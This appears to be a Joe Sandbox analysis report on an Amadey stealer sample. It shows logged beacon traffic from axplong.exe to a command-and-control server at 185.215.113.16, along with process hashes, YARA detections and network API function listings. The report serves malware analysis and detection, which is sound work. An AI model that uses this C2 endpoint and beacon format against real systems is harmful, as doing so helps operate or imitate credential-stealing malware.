Jul 27, 2024 09:35:59.263596058 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:59.264271021 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:59.557382107 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.6	49771	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:59.671575069 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:36:00.445875883 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:36:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:36:00.446614027 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:36:00.698757887 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:36:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.6	49772	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:36:00.806575060 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:36:01.551214933 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:36:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:36:01.576940060 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:36:01.822029114 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:36:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.6	49773	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:36:01.932753086 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:36:02.698842049 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:36:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:36:02.736279964 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:36:02.988058090 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:36:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.6	49774	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:36:03.104902983 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:36:03.853441000 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:36:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.6	49775	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:36:03.962127924 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:36:04.722702980 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:36:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.6	49776	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:36:04.840260029 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:36:05.665412903 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:36:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.6	49777	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:36:05.674417973 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:36:06.430763960 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:36:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Target ID:	1
Start time:	03:33:59
Start date:	27/07/2024
Path:	C:\Users\user\Desktop\9ICG2PuZbG.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\9ICG2PuZbG.exe"
Imagebase:	0x160000
File size:	1'897'984 bytes
MD5 hash:	C9774CB1F811AA79F9FDC173EE3DE6C1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.2156374942.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.2116109167.00000000049E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:34:01
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Imagebase:	0xbe0000
File size:	1'897'984 bytes
MD5 hash:	C9774CB1F811AA79F9FDC173EE3DE6C1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2145696772.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2186678248.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 53%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:34:01
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0xbe0000
File size:	1'897'984 bytes
MD5 hash:	C9774CB1F811AA79F9FDC173EE3DE6C1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2186588517.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2145827348.00000000053B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:35:00
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0xbe0000
File size:	1'897'984 bytes
MD5 hash:	C9774CB1F811AA79F9FDC173EE3DE6C1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000003.2723052390.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Function 04BD0B99 Relevance: 1.3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

Strings

&hR7, xrefs: 04BD0C03

Memory Dump Source

Source File: 00000001.00000002.2159314694.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4bd0000_9ICG2PuZbG.jbxd

Similarity

API ID:
String ID: &hR7
API String ID: 0-3538497471
Opcode ID: 5156bd0afe6345d608b6e073ab7a79e8cb872c2a69c7b0e65ae6f3ec7dfd552d
Instruction ID: 2c07ec1147e67cfd08b621775d0e2ebd070aae90f655fbb32e36faf824718599
Opcode Fuzzy Hash: 5156bd0afe6345d608b6e073ab7a79e8cb872c2a69c7b0e65ae6f3ec7dfd552d
Instruction Fuzzy Hash: E5F0ACB704C910BF970275968780EFA3A9AEE8323CB3580E9F41A47600B9A1BC40B991

Function 04BD0B8E Relevance: 1.3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

Strings

&hR7, xrefs: 04BD0C03

Memory Dump Source

Source File: 00000001.00000002.2159314694.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4bd0000_9ICG2PuZbG.jbxd

Similarity

API ID:
String ID: &hR7
API String ID: 0-3538497471
Opcode ID: 3f8136772c92ae116f2ed9fcd918c43e738b2e47fcf3f1fd02f88ba1fe16ac07
Instruction ID: 0b00e82cad693177cd013f6f00db654612f9d541e13e4a35a95abc2a3768da0f
Opcode Fuzzy Hash: 3f8136772c92ae116f2ed9fcd918c43e738b2e47fcf3f1fd02f88ba1fe16ac07
Instruction Fuzzy Hash: 73F081F744C514BF960275559680EB63E9AEE9333DB3540E5F41743201B5A1BC40F991

Function 04BD0BB2 Relevance: 1.3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

Strings

&hR7, xrefs: 04BD0C03

Memory Dump Source

Source File: 00000001.00000002.2159314694.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4bd0000_9ICG2PuZbG.jbxd

Similarity

API ID:
String ID: &hR7
API String ID: 0-3538497471
Opcode ID: b90c87c71c60765036b4448c2a7d7f4af901896056287e5ef82114de3edb4838
Instruction ID: cdb32273364d86c198fb657c883bbbee7e3fed3443044680f8862340e07b7b12
Opcode Fuzzy Hash: b90c87c71c60765036b4448c2a7d7f4af901896056287e5ef82114de3edb4838
Instruction Fuzzy Hash: D2F08BFB44C510BFA60279919A80EFA3B9AFFD3339B3580E9F01643101B9B1AC41A991

Function 04BD0BA2 Relevance: 1.3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

&hR7, xrefs: 04BD0C03

Memory Dump Source

Source File: 00000001.00000002.2159314694.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4bd0000_9ICG2PuZbG.jbxd

Similarity

API ID:
String ID: &hR7
API String ID: 0-3538497471
Opcode ID: 92e358a9c682fee1e582488fe14091e097f14552dc2f2f7724a8739523b3cc07
Instruction ID: 2c8cf93c44ea51a4d9d738184bdbb9b117c3335565c86150ffdaed5b46518116
Opcode Fuzzy Hash: 92e358a9c682fee1e582488fe14091e097f14552dc2f2f7724a8739523b3cc07
Instruction Fuzzy Hash: 2CF04CB704C510BFD6067A558680DB93A69EE93339B3984E5F41687101BAA1BC41EA90

Function 04BD0BC9 Relevance: 1.3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

Strings

&hR7, xrefs: 04BD0C03

Memory Dump Source

Source File: 00000001.00000002.2159314694.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4bd0000_9ICG2PuZbG.jbxd

Similarity

API ID:
String ID: &hR7
API String ID: 0-3538497471
Opcode ID: 02acc28a7a9a95afdc60ef1ee44428d7fca84dc43405428e2ec736f990695f3c
Instruction ID: 7bf215fdffc87940a0d6071c2c51d1df6fd50c9630018e934a07551c1fc42d9c
Opcode Fuzzy Hash: 02acc28a7a9a95afdc60ef1ee44428d7fca84dc43405428e2ec736f990695f3c
Instruction Fuzzy Hash: E2F05CF744C8106E9211B56599C0BFA3A99EEE2739B3584E9E0168320179A0BC41A991

Function 04BD0C02 Relevance: 1.3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

Strings

&hR7, xrefs: 04BD0C03

Memory Dump Source

Source File: 00000001.00000002.2159314694.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4bd0000_9ICG2PuZbG.jbxd

Similarity

API ID:
String ID: &hR7
API String ID: 0-3538497471
Opcode ID: e3bf8a5c9cbeef3a373295238a6180abc6eae449a6a1c0641503c94576616d88
Instruction ID: f8c86f768cb33256f86beb85fb9809f784e1f6fc44cefe72526e9d279b14a498
Opcode Fuzzy Hash: e3bf8a5c9cbeef3a373295238a6180abc6eae449a6a1c0641503c94576616d88
Instruction Fuzzy Hash: 4BF05CF744C8106E9211B6659AC4FFA3A99EEA2739B3584E9E0169310179A0B801A991

Function 04BD0BE5 Relevance: 1.3, Strings: 1, Instructions: 33COMMON

Download Yara Rule

Strings

&hR7, xrefs: 04BD0C03

Memory Dump Source

Source File: 00000001.00000002.2159314694.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4bd0000_9ICG2PuZbG.jbxd

Similarity

API ID:
String ID: &hR7
API String ID: 0-3538497471
Opcode ID: aee602f3f5db832b4ca05e2aa862618baf5b5146b1f30e13dd4a34ff0ba8ffee
Instruction ID: 0e6f47874b01ec0d28e3199428913f4f6fd77ce26897dc523d417ebab6ee29fa
Opcode Fuzzy Hash: aee602f3f5db832b4ca05e2aa862618baf5b5146b1f30e13dd4a34ff0ba8ffee
Instruction Fuzzy Hash: 32E0ABF788DC006FD701B610C6C0AFA3BA5EF8A338B3900ECD4040B100B924AC06EA90

Non-executed Functions

Function 04BD02BD Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2159314694.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4bd0000_9ICG2PuZbG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d2213019f49945214b5d7cecafdeea695c1a30da40aa6ecfb437dc7236c3a28
Instruction ID: 6827b89453edf1e3987eb4a89907ec0e713bfe651160d83ae5094e66d9529b81
Opcode Fuzzy Hash: 9d2213019f49945214b5d7cecafdeea695c1a30da40aa6ecfb437dc7236c3a28
Instruction Fuzzy Hash: CFF0E2E278D63AAF9043748A07425F22A5FE59F63CF2400D1B40B8EA81F6E4BA1170E1

Analysis Process: axplong.exePID: 5608, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	6.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	7.8%
Total number of Nodes:	601
Total number of Limit Nodes:	41

Executed Functions

Function 00BEBD60 Relevance: 19.6, APIs: 5, Strings: 6, Instructions: 310
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(00C38D70,00000000,00000000,00000000,00000000), ref: 00BEBDED
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00BEBE11
HttpOpenRequestA.WININET(?,00000000), ref: 00BEBE5B
HttpSendRequestA.WININET(?,00000000), ref: 00BEBF1A
InternetReadFile.WININET(?,?,000003FF,?), ref: 00BEBFCD
InternetCloseHandle.WININET(?), ref: 00BEC0A7
InternetCloseHandle.WININET(?), ref: 00BEC0AF
InternetCloseHandle.WININET(?), ref: 00BEC0B7

Strings

invalid stoi argument, xrefs: 00BEE404
stoi argument out of range, xrefs: 00BEE3FA
RpKt, xrefs: 00BED516
8KG0fCKZFzY=, xrefs: 00BEC385
8KG0fymoFx==, xrefs: 00BEC2EB, 00BEC543
RHYTYv==, xrefs: 00BEBE33

Memory Dump Source

Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_be0000_axplong.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$invalid stoi argument$stoi argument out of range
API String ID: 688256393-332458646
Opcode ID: c2bec4dd9b51a4a2ad0aa5a64294a25fe32cdf5679f69932502415dc8b777879
Instruction ID: e575fd2071a634acadbf2c0b4c448b995ead52116d7be15ce1890b5489bf77ab
Opcode Fuzzy Hash: c2bec4dd9b51a4a2ad0aa5a64294a25fe32cdf5679f69932502415dc8b777879
Instruction Fuzzy Hash: C2B1E3B0A001589BEB24CF29CC85BEEBBB5EF45304F5045E9F50897282DB719AC5CF95

Function 00BE65B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00BE6650

Strings

RBPleCSm, xrefs: 00BE666C
GVQsgL==, xrefs: 00BE66F8
IVKsgL==, xrefs: 00BE67A1

Memory Dump Source

Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
